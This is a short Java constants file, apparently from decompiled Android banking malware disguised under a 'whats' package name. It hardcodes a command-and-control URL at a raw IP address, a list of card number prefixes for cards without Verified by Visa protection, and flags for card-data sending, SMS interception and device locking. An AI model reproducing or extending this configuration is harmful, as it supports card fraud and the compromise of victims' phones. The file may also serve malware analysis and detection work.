package exts.whats;

public class Constants {
    public static final String ADMIN_LINK = "http://62.138.0.117/?action=command";
    public static final String APP_ID = "APP_ID";
    public static final String[] BINS_WITHOUT_VBV = {"400319", "402041", "402042", "402043", "402044", "402169", "402186", "402222", "402290", "402425", "402426", "402427", "402428", "403328", "405656", "405785", "406261", "406277", "406278", "406279", "408089", "413397", "417654", "417783", "419037", "419038", "419039", "419040", "420900", "420901", "420902", "420967", "424328", "426006", "426007", "426008", "426009", "431486", "431487", "431488", "431489", "432917", "432918", "432919", "432920", "432930", "432931", "432932", "432933", "433976", "448436", "448437", "448438", "448439", "453220", "453221", "453222", "453223", "453997", "453998", "453999", "454727", "456805", "456806", "456807", "456808", "482463", "487708", "489972", "491691", "492295", "492296", "493500", "510134", "511650", "511651", "511652", "511653", "512750", "512797", "513348", "518525", "518648", "520014", "520345", "520998", "522842", "522843", "522844", "522845", "524343", "524393", "524395", "524396", "524397", "525500", "525501", "525502", "525503", "525540", "525541", "525543", "525570", "525574", "525590", "525591", "525592", "525593", "525594", "526265", "526739", "526740", "526741", "526742", "528097", "528158", "529204", "531542", "532428", "533217", "541506", "541517", "541520", "541539", "548281", "550217", "552178", "552180", "553087", "553139", "553426", "553429", "553430", "553432", "553439", "553456", "554842", "556025", "558475", "558646", "558686", "558687", "558688", "558689", "616788", "676188", "676820"};
    public static final String CARD_SENT = "CARD_SENT";
    public static final String INSTALL_ID = "1";
    public static final String INSTALL_SENT = "INSTALL_SENT";
    public static final String INTERCEPTING_ENABLED = "INTERCEPTING_ENABLED";
    public static final String LOCK_ENABLED = "LOCK_ENABLED";
    public static final String PREFS_NAME = "app_settings";
    public static final int REQUEST_INTERVAL = 60;
}
